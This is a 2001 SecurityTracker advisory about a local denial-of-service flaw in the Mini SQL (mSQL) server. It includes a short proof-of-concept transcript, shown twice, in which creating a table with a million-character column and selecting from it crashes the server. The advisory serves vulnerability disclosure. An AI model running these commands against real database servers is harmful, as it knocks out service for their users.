mSQL Database Can Be Crashed By Local Users
|
|
SecurityTracker Alert ID: 1003059 |
|
SecurityTracker URL: http://securitytracker.com/id/1003059
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Dec 27 2001
|
Impact:
Denial of service via local system
|
Exploit Included: Yes
|
|
Description:
A denial of service vulnerability has been reported in the Mini SQL (mSQL) database server. A local user can cause the database to crash.
It is reported that a local user can cause the database to crash by creating a table with a large column.
A demonstration exploit transcript is provided:
mSQL > create table qqq (www char(1000000)) \g
Query OK. 1 row(s) modified or retrieved.
mSQL > select * from qqq \g
ERROR : MSQL server has gone away
[Editor's Note: It is not clear whether one local user can crash the database for sessions belonging to other local users or not.]
|
Impact:
A local user with privileges to modify the database can cause the database to crash.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.hughes.com.au/products/msql/ (Links to External Site)
|
Cause:
Not specified
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 26 Dec 2001 17:51:37 +0300
Subject: msql DoS
|
[lesha@lesha /dl]$ /usr/local/Hughes/bin/msql test
Welcome to the miniSQL monitor. Type \h for help.
mSQL > create table qqq (www char(1000000)) \g
Query OK. 1 row(s) modified or retrieved.
mSQL > select * from qqq \g
ERROR : MSQL server has gone away
--
|
|
